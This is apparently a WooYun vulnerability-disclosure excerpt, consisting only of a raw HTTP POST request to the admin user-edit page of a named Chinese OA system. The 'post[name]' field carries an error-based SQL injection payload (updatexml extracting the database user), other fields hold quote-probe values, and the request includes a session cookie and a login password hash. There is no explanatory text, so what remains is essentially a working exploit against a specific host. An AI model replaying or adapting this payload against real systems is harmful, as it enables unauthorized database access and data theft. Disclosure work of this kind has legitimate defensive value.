WooYun.org

POST http://oa.xun-ao.com/admin/user/user.post.php HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Referer: http://oa.xun-ao.com/admin/user/user_edit.php
Accept-Language: zh-CN
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: multipart/form-data; boundary=---------------------------7de168185b0368
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Content-Length: 1063
Host: oa.xun-ao.com
Pragma: no-cache
Cookie: PHPSESSID=b37ft762aldqvs1qceas4pub96; loginpass=faa87452e3adea3d7a8c5bd4b1882c44
-----------------------------7de168185b0368
Content-Disposition: form-data; name="post[name]"
aaaaaa' and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))#
-----------------------------7de168185b0368
Content-Disposition: form-data; name="post[chinese_name]"
asdasdas'
-----------------------------7de168185b0368
Content-Disposition: form-data; name="post[password]"
adad'
-----------------------------7de168185b0368
Content-Disposition: form-data; name="post[nick_name]"
adad'
-----------------------------7de168185b0368
Content-Disposition: form-data; name="post[description]"
adad'
-----------------------------7de168185b0368
Content-Disposition: form-data; name="post[role_name]"
admin
-----------------------------7de168185b0368
Content-Disposition: form-data; name="image_src"; filename=""
Content-Type: application/octet-stream
-----------------------------7de168185b0368
Content-Disposition: form-data; name="id"
0
-----------------------------7de168185b0368
Content-Disposition: form-data; name="post[role_level]"
-----------------------------7de168185b0368--